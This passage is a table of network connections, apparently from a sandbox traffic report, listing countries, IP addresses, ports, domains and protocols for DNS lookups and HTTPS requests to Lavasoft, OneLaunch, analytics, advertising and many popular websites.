| US | 104.18.13.11:443 | flwadw.com | tcp |
| US | 8.8.8.8:53 | 11.13.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wcdownloadercdn.lavasoft.com | udp |
| US | 104.17.8.52:80 | wcdownloadercdn.lavasoft.com | tcp |
| US | 8.8.8.8:53 | 52.8.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | e2c66.gcp.gvt2.com | udp |
| US | 34.166.9.70:443 | e2c66.gcp.gvt2.com | tcp |
| US | 104.17.9.52:80 | wcdownloadercdn.lavasoft.com | tcp |
| US | 8.8.8.8:53 | 70.9.166.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.26.24.184.in-addr.arpa | udp |
| US | 104.17.9.52:443 | wcdownloadercdn.lavasoft.com | tcp |
| US | 104.18.13.11:443 | flwadw.com | tcp |
| US | 8.8.8.8:53 | wc-partners.lavasoft.com | udp |
| CA | 64.18.87.81:80 | wc-partners.lavasoft.com | tcp |
| US | 8.8.8.8:53 | 81.87.18.64.in-addr.arpa | udp |
| US | 35.190.25.25:443 | api.mixpanel.com | tcp |
| US | 104.26.13.224:443 | release-cdn.onelaunch.com | tcp |
| US | 104.26.13.224:443 | release-cdn.onelaunch.com | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| NL | 142.251.36.46:80 | clients2.google.com | tcp |
| NL | 142.251.36.46:80 | clients2.google.com | tcp |
| NL | 142.250.179.163:443 | update.googleapis.com | tcp |
| US | 8.8.8.8:53 | api.keen.io | udp |
| US | 52.35.254.249:443 | api.keen.io | tcp |
| US | 52.35.254.249:443 | api.keen.io | tcp |
| US | 8.8.8.8:53 | 163.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.254.35.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | onenews.com | udp |
| US | 8.8.8.8:53 | onenews.com | udp |
| US | 104.26.5.199:443 | onenews.com | tcp |
| US | 8.8.8.8:53 | 199.5.26.104.in-addr.arpa | udp |
| US | 172.67.186.30:443 | geteasypdf.com | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | static.slickdealscdn.com | udp |
| US | 104.18.23.62:443 | static.slickdealscdn.com | tcp |
| US | 8.8.8.8:53 | 62.23.18.104.in-addr.arpa | udp |
| NL | 142.250.102.155:443 | stats.g.doubleclick.net | udp |
| NL | 142.251.36.1:443 | tpc.googlesyndication.com | udp |
| NL | 142.251.36.2:443 | googleads.g.doubleclick.net | udp |
| US | 104.26.5.199:443 | onenews.com | tcp |
| US | 8.8.8.8:53 | chrmxtnsnhdnnlnch.onelaunch.com | udp |
| US | 8.8.8.8:53 | chrmxtnsnhdnnlnch.onelaunch.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | tcp |
| US | 104.26.12.224:443 | chrmxtnsnhdnnlnch.onelaunch.com | tcp |
| NL | 172.217.168.202:443 | optimizationguide-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | webcompanion.com | udp |
| US | 104.18.211.25:80 | webcompanion.com | tcp |
| US | 8.8.8.8:53 | 141.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.12.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.211.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | extensions-cdn.onelaunch.com | udp |
| US | 8.8.8.8:53 | extensions-cdn.onelaunch.com | udp |
| US | 104.26.12.224:443 | extensions-cdn.onelaunch.com | tcp |
| US | 52.35.254.249:443 | api.keen.io | tcp |
| US | 104.26.13.224:443 | extensions-cdn.onelaunch.com | tcp |
| US | 35.190.25.25:443 | api.mixpanel.com | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| NL | 216.58.214.14:80 | youtube.com | tcp |
| NL | 216.58.214.14:80 | youtube.com | tcp |
| NL | 216.58.214.14:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | 14.214.58.216.in-addr.arpa | udp |
| NL | 216.58.214.22:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | beacons4.gvt2.com | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 52.35.254.249:443 | api.keen.io | tcp |
| US | 35.190.25.25:443 | api.mixpanel.com | tcp |
| US | 35.190.25.25:443 | api.mixpanel.com | tcp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | cdn.inspectlet.com | udp |
| US | 172.67.10.172:443 | cdn.inspectlet.com | tcp |
| US | 8.8.8.8:53 | hn.inspectlet.com | udp |
| NL | 142.250.179.202:443 | optimizationguide-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 172.10.67.172.in-addr.arpa | udp |
| US | 104.17.9.52:443 | wcdownloadercdn.lavasoft.com | tcp |
| US | 8.8.8.8:53 | api.accuweather.com | udp |
| NL | 23.72.252.64:80 | api.accuweather.com | tcp |
| US | 8.8.8.8:53 | 64.252.72.23.in-addr.arpa | udp |
| US | 104.18.13.11:443 | flwadw.com | tcp |
| US | 35.190.25.25:443 | api.mixpanel.com | tcp |
| NL | 23.72.252.64:443 | api.accuweather.com | tcp |
| NL | 23.72.252.64:443 | api.accuweather.com | tcp |
| US | 8.8.8.8:53 | sg-bitmask.adaware.com | udp |
| US | 52.35.254.249:443 | api.keen.io | tcp |
| US | 104.18.68.73:443 | sg-bitmask.adaware.com | tcp |
| US | 8.8.8.8:53 | 73.68.18.104.in-addr.arpa | udp |
| US | 104.26.13.224:443 | extensions-cdn.onelaunch.com | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| NL | 216.58.214.14:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | facebook.com | udp |
| GB | 157.240.221.35:443 | facebook.com | tcp |
| US | 8.8.8.8:53 | 35.221.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| NL | 157.240.247.35:443 | www.facebook.com | tcp |
| GB | 157.240.221.35:443 | facebook.com | tcp |
| NL | 157.240.247.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | static.xx.fbcdn.net | udp |
| GB | 157.240.221.16:443 | static.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | edgedl.me.gvt1.com | udp |
| US | 34.104.35.123:80 | edgedl.me.gvt1.com | tcp |
| US | 8.8.8.8:53 | reddit.com | udp |
| US | 151.101.193.140:443 | reddit.com | tcp |
| US | 151.101.193.140:443 | reddit.com | tcp |
| US | 151.101.193.140:443 | reddit.com | tcp |
| US | 151.101.193.140:443 | reddit.com | tcp |
| US | 151.101.193.140:443 | reddit.com | tcp |
| US | 8.8.8.8:53 | www.reddit.com | udp |
| US | 151.101.1.140:443 | www.reddit.com | tcp |
| US | 8.8.8.8:53 | 123.35.104.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.193.101.151.in-addr.arpa | udp |
| IN | 142.250.183.131:443 | id.google.com | udp |
| US | 151.101.1.140:443 | www.reddit.com | tcp |
| US | 8.8.8.8:53 | en.wikipedia.org | udp |
| NL | 91.198.174.192:443 | en.wikipedia.org | tcp |
| US | 8.8.8.8:53 | 192.174.198.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | yt3.ggpht.com | udp |
| NL | 142.251.36.1:443 | yt3.ggpht.com | tcp |
| NL | 142.251.36.1:443 | yt3.ggpht.com | tcp |
| NL | 142.251.36.1:443 | yt3.ggpht.com | tcp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 104.244.42.65:443 | twitter.com | tcp |
| US | 104.244.42.65:443 | twitter.com | tcp |
| US | 104.244.42.65:443 | twitter.com | tcp |
| US | 104.244.42.65:443 | twitter.com | tcp |
| US | 8.8.8.8:53 | 65.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | abs.twimg.com | udp |
| US | 152.199.24.185:443 | abs.twimg.com | tcp |
| US | 8.8.8.8:53 | 185.24.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ebay.com | udp |
| US | 209.140.136.254:443 | ebay.com | tcp |
| US | 8.8.8.8:53 | www.ebay.com | udp |
| NL | 104.85.5.31:443 | www.ebay.com | tcp |
| NL | 104.85.5.31:80 | www.ebay.com | tcp |
| US | 8.8.8.8:53 | pages.ebay.com | udp |
| NL | 104.85.5.128:80 | pages.ebay.com | tcp |
| NL | 104.85.5.128:443 | pages.ebay.com | tcp |
| US | 8.8.8.8:53 | 254.136.140.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.5.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.5.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 104.16.57.101:443 | static.cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | 101.57.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | cloudflareinsights.com | udp |
| US | 104.16.56.101:443 | cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 209.140.136.254:443 | ebay.com | tcp |
| US | 8.8.8.8:53 | 101.56.16.104.in-addr.arpa | udp |
| NL | 104.85.5.31:443 | www.ebay.com | tcp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | instagram.com | udp |
| GB | 157.240.221.174:443 | instagram.com | tcp |
| US | 8.8.8.8:53 | www.instagram.com | udp |
| NL | 157.240.201.174:443 | www.instagram.com | tcp |
| GB | 157.240.221.174:443 | instagram.com | tcp |
| US | 8.8.8.8:53 | widgets.outbrain.com | udp |
| US | 8.8.8.8:53 | widgets.outbrain.com | udp |
| NL | 104.85.1.87:443 | widgets.outbrain.com | tcp |
| US | 8.8.8.8:53 | olntptiles.tiles.ampfeed.com | udp |
| US | 8.8.8.8:53 | olntptiles.tiles.ampfeed.com | udp |
| NL | 23.222.35.120:443 | olntptiles.tiles.ampfeed.com | tcp |
| NL | 157.240.201.174:443 | www.instagram.com | tcp |
| US | 8.8.8.8:53 | static.cdninstagram.com | udp |
| GB | 157.240.221.63:443 | static.cdninstagram.com | tcp |
| US | 8.8.8.8:53 | 174.221.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.201.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.35.222.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | netflix.com | udp |
| US | 3.211.157.115:443 | netflix.com | tcp |
| US | 8.8.8.8:53 | suggestqueries-clients6.youtube.com | udp |
| NL | 172.217.168.206:443 | suggestqueries-clients6.youtube.com | tcp |
| US | 3.211.157.115:443 | netflix.com | tcp |
| NL | 172.217.168.206:443 | suggestqueries-clients6.youtube.com | udp |
| US | 3.211.157.115:443 | netflix.com | tcp |
| US | 8.8.8.8:53 | 63.221.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.157.211.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.168.217.172.in-addr.arpa | udp |
| US | 3.211.157.115:443 | netflix.com | tcp |
| US | 3.211.157.115:443 | netflix.com | tcp |
| US | 3.211.157.115:443 | netflix.com | tcp |
| NL | 172.217.168.206:443 | suggestqueries-clients6.youtube.com | udp |
| US | 3.211.157.115:443 | netflix.com | tcp |
| US | 3.211.157.115:443 | netflix.com | tcp |
| US | 3.211.157.115:443 | netflix.com | tcp |
| US | 3.211.157.115:443 | netflix.com | tcp |
| NL | 142.250.179.132:443 | t3.gstatic.com | tcp |
| US | 8.8.8.8:53 | linkedin.com | udp |
| US | 13.107.42.14:443 | linkedin.com | tcp |
| US | 13.107.42.14:443 | linkedin.com | tcp |
| US | 13.107.42.14:443 | linkedin.com | tcp |
| US | 8.8.8.8:53 | 132.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tcheck.outbrainimg.com | udp |
| US | 8.8.8.8:53 | tcheck.outbrainimg.com | udp |
| US | 23.36.245.141:443 | tcheck.outbrainimg.com | tcp |
| US | 8.8.8.8:53 | widget-pixels.outbrain.com | udp |
| US | 8.8.8.8:53 | widget-pixels.outbrain.com | udp |
| US | 13.107.42.14:443 | linkedin.com | tcp |
| US | 8.8.8.8:53 | 141.245.36.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.googleoptimize.com | udp |
| US | 8.8.8.8:53 | www.googleoptimize.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| NL | 142.250.102.154:443 | stats.g.doubleclick.net | tcp |
| NL | 142.250.102.154:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.licdn.com | udp |
| US | 13.107.246.67:443 | static.licdn.com | tcp |
| US | 8.8.8.8:53 | outlook.live.com | udp |
| NL | 52.97.250.210:443 | outlook.live.com | tcp |
| US | 8.8.8.8:53 | twitch.tv | udp |
| US | 151.101.130.167:443 | twitch.tv | tcp |
| US | 8.8.8.8:53 | www.twitch.tv | udp |
| NL | 199.232.150.167:443 | www.twitch.tv | tcp |
| US | 151.101.130.167:443 | twitch.tv | tcp |
| US | 8.8.8.8:53 | 154.102.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.250.97.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.130.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.150.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chase.com | udp |
| US | 159.53.44.60:443 | chase.com | tcp |
| US | 8.8.8.8:53 | www.chase.com | udp |
| US | 8.8.8.8:53 | analytics.google.com | udp |
| US | 8.8.8.8:53 | analytics.google.com | udp |
| NL | 104.110.240.99:443 | www.chase.com | tcp |
| NL | 216.58.214.14:443 | analytics.google.com | tcp |
| US | 159.53.44.60:443 | chase.com | tcp |
| NL | 216.58.214.14:443 | analytics.google.com | udp |
| US | 8.8.8.8:53 | 60.44.53.159.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.240.110.104.in-addr.arpa | udp |
| US | 159.53.44.60:443 | chase.com | tcp |
| US | 159.53.44.60:443 | chase.com | tcp |
| US | 159.53.44.60:443 | chase.com | tcp |
| NL | 104.110.240.99:443 | www.chase.com | tcp |
| NL | 104.110.240.99:80 | www.chase.com | tcp |
| US | 8.8.8.8:53 | mail.google.com | udp |
| DE | 172.217.23.197:443 | mail.google.com | tcp |
| DE | 172.217.23.197:443 | mail.google.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| DE | 172.217.23.195:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | office.com | udp |
| US | 13.107.6.156:443 | office.com | tcp |
| US | 8.8.8.8:53 | www.office.com | udp |
| US | 13.107.6.156:443 | www.office.com | tcp |
| US | 8.8.8.8:53 | 197.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.23.217.172.in-addr.arpa | udp |
| US | 13.107.6.156:443 | www.office.com | tcp |
| NL | 142.251.36.1:443 | yt3.ggpht.com | udp |
| NL | 216.58.214.22:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | 156.6.107.13.in-addr.arpa | udp |
| US | 13.107.6.156:443 | www.office.com | tcp |
| US | 8.8.8.8:53 | res.cdn.office.net | udp |
| NL | 104.110.240.65:443 | res.cdn.office.net | tcp |
| US | 208.82.237.129:443 | craigslist.org | tcp |
| NL | 142.250.179.141:443 | accounts.google.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | www.craigslist.org | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 208.82.238.225:443 | www.craigslist.org | tcp |
| NL | 142.251.36.46:443 | clients2.google.com | udp |
| US | 8.8.8.8:53 | yt3.googleusercontent.com | udp |
| NL | 172.217.168.225:443 | yt3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | 65.240.110.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.237.82.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.238.82.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr2---sn-5hnekn7d.googlevideo.com | udp |
| NL | 209.85.226.39:443 | rr2---sn-5hnekn7d.googlevideo.com | tcp |
| NL | 209.85.226.39:443 | rr2---sn-5hnekn7d.googlevideo.com | tcp |
| US | 208.82.238.225:443 | www.craigslist.org | tcp |
| NL | 209.85.226.39:443 | rr2---sn-5hnekn7d.googlevideo.com | udp |
| US | 8.8.8.8:53 | 39.226.85.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| NL | 142.251.36.14:443 | play.google.com | tcp |
| NL | 142.251.36.14:443 | play.google.com | udp |
| NL | 142.251.36.14:443 | play.google.com | udp |
| NL | 142.251.36.2:443 | googleads.g.doubleclick.net | udp |
| US | 208.82.237.129:443 | craigslist.org | tcp |
| US | 208.82.237.129:443 | craigslist.org | tcp |
| US | 208.82.237.129:443 | craigslist.org | tcp |
| US | 208.82.237.129:443 | craigslist.org | tcp |
| US | 208.82.237.129:443 | craigslist.org | tcp |
| US | 208.82.237.129:443 | craigslist.org | tcp |
| US | 8.8.8.8:53 | cnn.com | udp |
| US | 151.101.67.5:443 | cnn.com | tcp |
| US | 8.8.8.8:53 | www.cnn.com | udp |
| US | 151.101.3.5:443 | www.cnn.com | tcp |
| US | 8.8.8.8:53 | edition.cnn.com | udp |
| US | 151.101.67.5:443 | edition.cnn.com | tcp |
| US | 151.101.67.5:443 | edition.cnn.com | tcp |
| US | 151.101.3.5:443 | edition.cnn.com | tcp |
| US | 151.101.67.5:443 | edition.cnn.com | tcp |
| US | 8.8.8.8:53 | 5.67.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.3.101.151.in-addr.arpa | udp |
| US | 151.101.67.5:443 | edition.cnn.com | tcp |
| US | 151.101.67.5:443 | edition.cnn.com | tcp |
| US | 151.101.3.5:443 | edition.cnn.com | tcp |
| US | 151.101.67.5:443 | edition.cnn.com | tcp |
| US | 151.101.3.5:443 | edition.cnn.com | tcp |
| US | 151.101.67.5:443 | edition.cnn.com | tcp |
| US | 8.8.8.8:53 | api-ext.slickdeals.net | udp |
| US | 8.8.8.8:53 | api-ext.slickdeals.net | udp |
| US | 54.148.74.134:443 | api-ext.slickdeals.net | tcp |
| US | 8.8.8.8:53 | 134.74.148.54.in-addr.arpa | udp |
| US | 151.101.67.5:80 | edition.cnn.com | tcp |
| US | 8.8.8.8:53 | espn.com | udp |
| US | 18.239.94.102:443 | espn.com | tcp |
| US | 8.8.8.8:53 | www.espn.com | udp |
| NL | 65.9.86.57:443 | www.espn.com | tcp |
| US | 8.8.8.8:53 | microsoft.com | udp |
| US | 20.112.250.133:443 | microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | 57.86.9.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.250.112.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | slickdeals.net | udp |
| US | 8.8.8.8:53 | slickdeals.net | udp |
| US | 104.17.126.18:443 | slickdeals.net | tcp |
| US | 8.8.8.8:53 | 163.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.126.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr2---sn-5hnekn7s.googlevideo.com | udp |
| NL | 74.125.100.39:443 | rr2---sn-5hnekn7s.googlevideo.com | udp |
| US | 8.8.8.8:53 | 39.100.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr4---sn-5hne6nzd.googlevideo.com | udp |
| NL | 74.125.100.233:443 | rr4---sn-5hne6nzd.googlevideo.com | udp |
| US | 8.8.8.8:53 | 233.100.125.74.in-addr.arpa | udp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | w.clarity.ms | udp |
| US | 23.96.124.156:443 | w.clarity.ms | tcp |
| US | 20.112.250.133:443 | microsoft.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| NL | 142.251.36.2:443 | googleads.g.doubleclick.net | udp |
| NL | 142.251.36.1:443 | yt3.ggpht.com | udp |
| US | 8.8.8.8:53 | imgur.com | udp |
| US | 199.232.196.193:443 | imgur.com | tcp |
| US | 8.8.8.8:53 | imdb.com | udp |
| US | 52.94.225.248:443 | imdb.com | tcp |
| US | 8.8.8.8:53 | www.imdb.com | udp |
| DE | 108.138.15.120:443 | www.imdb.com | tcp |
| US | 8.8.8.8:53 | dropbox.com | udp |
| US | 162.125.248.18:443 | dropbox.com | tcp |
| US | 8.8.8.8:53 | www.dropbox.com | udp |
| US | 162.125.8.18:443 | www.dropbox.com | tcp |
| US | 8.8.8.8:53 | 193.196.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.225.94.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.15.138.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.248.125.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons3.gvt2.com | udp |
| GB | 216.58.208.99:443 | beacons3.gvt2.com | tcp |
| GB | 216.58.208.99:443 | beacons3.gvt2.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | udp |
| US | 162.125.248.18:443 | dropbox.com | tcp |
| US | 8.8.8.8:53 | 18.8.125.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.208.58.216.in-addr.arpa | udp |
| US | 162.125.8.18:443 | www.dropbox.com | tcp |
| NL | 216.58.214.14:443 | analytics.google.com | udp |
| US | 8.8.8.8:53 | www.mediafire.com | udp |
| US | 104.16.53.48:443 | www.mediafire.com | tcp |
| US | 8.8.8.8:53 | 48.53.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 104.16.56.101:443 | static.cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| NL | 142.250.179.206:443 | translate.google.com | tcp |
| US | 8.8.8.8:53 | cfl.dropboxstatic.com | udp |
| US | 104.16.99.29:443 | cfl.dropboxstatic.com | tcp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| DE | 172.217.23.202:443 | translate.googleapis.com | tcp |
| US | 8.8.8.8:53 | 29.99.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | translate-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | paypal.com | udp |
| US | 64.4.250.37:443 | paypal.com | tcp |
| NL | 142.250.179.202:443 | translate-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | www.paypal.com | udp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| US | 8.8.8.8:53 | 37.250.4.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.paypalobjects.com | udp |
| US | 192.229.210.155:443 | www.paypalobjects.com | tcp |
| US | 192.229.210.155:443 | www.paypalobjects.com | tcp |
| US | 8.8.8.8:53 | 155.210.229.192.in-addr.arpa | udp |
| US | 64.4.250.37:443 | paypal.com | tcp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| DE | 172.217.23.202:443 | translate-pa.googleapis.com | udp |
| US | 192.229.210.155:443 | www.paypalobjects.com | tcp |
| US | 8.8.8.8:53 | salesforce.com | udp |
| US | 23.1.35.132:443 | salesforce.com | tcp |
| NL | 142.250.179.206:443 | translate.google.com | udp |
| US | 8.8.8.8:53 | 132.35.1.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.salesforce.com | udp |
| NL | 104.110.240.163:443 | www.salesforce.com | tcp |
| US | 8.8.8.8:53 | 163.240.110.104.in-addr.arpa | udp |
| US | 23.1.35.132:443 | salesforce.com | tcp |
| US | 104.16.53.48:443 | static.mediafire.com | tcp |
| NL | 104.110.240.163:443 | www.salesforce.com | tcp |
| NL | 104.110.240.163:80 | www.salesforce.com | tcp |
| US | 8.8.8.8:53 | apple.com | udp |
| US | 17.253.144.10:443 | apple.com | tcp |
| DE | 184.24.25.242:443 | www.apple.com | tcp |
| US | 17.253.144.10:443 | apple.com | tcp |
| US | 8.8.8.8:53 | tmall.com | udp |
| CN | 59.82.122.115:443 | tmall.com | tcp |
| NL | 142.251.36.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 242.25.24.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.122.82.59.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.144.253.17.in-addr.arpa | tcp |
| US | 8.8.8.8:53 | www.tmall.com | udp |
| NL | 47.246.48.232:443 | www.tmall.com | tcp |
| US | 8.8.8.8:53 | fixthephoto.com | udp |
| US | 18.239.94.101:443 | fixthephoto.com | tcp |
| NL | 47.246.48.233:443 | www.tmall.com | tcp |
| US | 8.8.8.8:53 | 232.48.246.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.94.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.cookie-script.com | udp |
| DE | 116.203.90.127:443 | cdn.cookie-script.com | tcp |
| US | 18.239.94.101:443 | fixthephoto.com | udp |
| US | 8.8.8.8:53 | z-na.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | a.omappapi.com | udp |
| US | 8.8.8.8:53 | a.opmnstr.com | udp |
| IN | 103.180.115.7:443 | a.opmnstr.com | tcp |
| IN | 103.180.115.7:443 | a.opmnstr.com | tcp |
| NL | 13.227.222.145:443 | z-na.amazon-adsystem.com | tcp |
| CN | 59.82.122.115:443 | tmall.com | tcp |
| US | 8.8.8.8:53 | 127.90.203.116.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.48.246.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.222.227.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.115.180.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| NL | 142.251.36.34:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | analytics.google.com | udp |
| NL | 142.250.102.155:443 | stats.g.doubleclick.net | udp |
| NL | 47.246.48.232:443 | www.tmall.com | tcp |
| US | 8.8.8.8:53 | api.omappapi.com | udp |
| US | 8.8.8.8:53 | aax-us-east.amazon-adsystem.com | udp |
| US | 52.46.154.240:443 | aax-us-east.amazon-adsystem.com | tcp |
| NL | 65.9.86.98:443 | api.omappapi.com | tcp |
| US | 8.8.8.8:53 | partner.googleadservices.com | udp |
| NL | 142.251.36.2:443 | partner.googleadservices.com | udp |
| US | 8.8.8.8:53 | fls-na.amazon-adsystem.com | udp |
| US | 52.94.233.131:443 | fls-na.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | www.dpbolvw.net | udp |
| NL | 89.207.16.75:443 | www.dpbolvw.net | tcp |
| NL | 89.207.16.75:443 | www.dpbolvw.net | tcp |
| US | 8.8.8.8:53 | img.alicdn.com | udp |
| US | 8.8.8.8:53 | cj.dotomi.com | udp |
| NL | 89.207.16.75:443 | cj.dotomi.com | tcp |
| US | 8.8.8.8:53 | www.emjcd.com | udp |
| NL | 89.207.16.75:443 | www.emjcd.com | tcp |
| US | 8.8.8.8:53 | www.kaspersky.com | udp |
| US | 144.121.3.166:443 | www.kaspersky.com | tcp |
| US | 8.8.8.8:53 | 98.86.9.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.154.46.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.233.94.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.16.207.89.in-addr.arpa | udp |
| GB | 79.133.176.252:443 | img.alicdn.com | tcp |
| US | 8.8.8.8:53 | safebrowsing.googleapis.com | udp |
| US | 8.8.8.8:53 | safebrowsing.googleapis.com | udp |
| NL | 142.250.179.170:443 | safebrowsing.googleapis.com | tcp |
| US | 8.8.8.8:53 | www.kaspersky.co.in | udp |
| US | 144.121.3.166:443 | www.kaspersky.co.in | tcp |
| US | 8.8.8.8:53 | sgtm.kaspersky.de | udp |
| US | 8.8.8.8:53 | service.maxymiser.net | udp |
| US | 216.239.38.21:443 | sgtm.kaspersky.de | tcp |
| NL | 88.221.25.131:443 | service.maxymiser.net | tcp |
| US | 8.8.8.8:53 | nytimes.com | udp |
| US | 151.101.1.164:443 | nytimes.com | tcp |
| US | 8.8.8.8:53 | www.nytimes.com | udp |
